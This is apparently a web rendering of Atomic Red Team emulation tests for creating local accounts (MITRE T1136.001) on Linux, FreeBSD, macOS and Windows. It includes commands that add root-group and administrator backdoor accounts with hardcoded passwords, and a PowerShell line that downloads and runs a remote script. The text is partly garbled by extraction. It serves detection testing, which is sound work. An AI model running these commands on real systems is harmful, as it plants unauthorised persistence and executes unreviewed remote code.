Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. For example, with a sufficient level of access, the Windowsnet user /add
command can be used to create a local account. On macOS systems thedscl -create
command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such asusername
, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security) Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Atomic Test #6 - Create a new user in Linux with
UID and GID.1
root
Atomic Test #7 - Create a new user in FreeBSD with
GID.1
root
Create a user via useradd
Supported Platforms: Linux
auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | evil_user|
1
bash
! Elevation Required (e.g. root or admin)1
useradd -M -N -r -s /bin/bash -c evil_account #{username}
1
userdel #{username}
Create a user via pw
Supported Platforms: Linux
auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | evil_user|
1
sh
! Elevation Required (e.g. root or admin)1
pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account
1
rmuser -y #{username}
Creates a user on a MacOS system with dscl
Supported Platforms: macOS
auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | evil_user| | realname | ‘realname’ to record when creating the user | string | Evil Account|
1
bash
! Elevation Required (e.g. root or admin)1
2
3
4
5
6
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
1
dscl . -delete /Users/#{username}
Creates a new user in a command prompt. Upon execution, “The command completed successfully.” will be displayed. To verify the new account, run “net user” in powershell or CMD and observe that there is a new user named “T1136.001_CMD”
Supported Platforms: Windows
auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | T1136.001_CMD| | password | Password of the user to create | string | T1136.001_CMD!|
1
command_prompt
! Elevation Required (e.g. root or admin)net user /add "#{username}" "#{password}"
net user /del "#{username}" >nul 2>&1
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run “net user” in powershell or CMD and observe that there is a new user named “T1136.001_PowerShell”
Supported Platforms: Windows
auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | T1136.001_PowerShell|
1
powershell
! Elevation Required (e.g. root or admin)1
New-LocalUser -Name "#{username}" -NoPassword
1
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
1
root
UID and GID.Creates a new user in Linux and adds the user to the
group. This technique was used by adversaries during the Butter attack campaign.1
root
Supported Platforms: Linux
auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | butter| | password | Password of the user to create | string | BetterWithButter|
1
bash
! Elevation Required (e.g. root or admin)1
2
useradd -g 0 -M -d /root -s /bin/bash #{username}
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
1
userdel #{username}
1
root
GID.Creates a new user in FreeBSD and adds the user to the
group. This technique was used by adversaries during the Butter attack campaign.1
root
Supported Platforms: Linux
auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | butter| | password | Password of the user to create | string | BetterWithButter|
1
sh
! Elevation Required (e.g. root or admin)1
2
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0
1
pw userdel #{username}
Creates a new admin user in a command prompt.
Supported Platforms: Windows
auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559
| Name | Description | Type | Default Value | |——|————-|——|—————| | username | Username of the user to create | string | T1136.001_Admin| | password | Password of the user to create | string | T1136_pass|
1
command_prompt
! Elevation Required (e.g. root or admin)net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /add
net user /del "#{username}" >nul 2>&1
Creates a new admin user in a powershell session without using net.exe
Supported Platforms: Windows
auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f
1
powershell
! Elevation Required (e.g. root or admin)1
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')